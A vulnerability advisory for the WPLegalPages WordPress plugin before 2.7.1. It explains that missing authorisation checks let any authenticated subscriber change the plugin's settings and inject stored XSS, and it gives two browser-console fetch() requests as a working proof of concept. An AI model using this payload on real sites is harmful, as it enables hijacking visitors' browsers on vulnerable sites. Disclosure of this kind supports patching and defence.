WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS

2022-01-0500:00:00

Krzysztof Zając

wplegalpages

subscriber+

arbitrary settings update

stored xss

web developer console

web browser

authenticated user

admin-ajax.php

urlsearchparams

post method

credentials include

frontend pages

exploit

EPSS

0.001

Percentile

21.1%

JSON

The plugin does not check for authorisation and has a flawed CSRF logic when saving its settings, allowing any authenticated users, such as subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, it could lead to Stored Cross-Site Scripting

Run the below command in the web developer console of the web browser when being authenticated as any user

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"lp_save_admin_settings", "lp-cookie-bar": "ON"}),
  "method": "POST",
  "credentials": "include"
});fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//"}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered in all frontend pages

EPSS

0.001

Percentile

21.1%

JSON

Related for WPEX-ID:47DF802D-5200-484B-959C-9F569EDF992E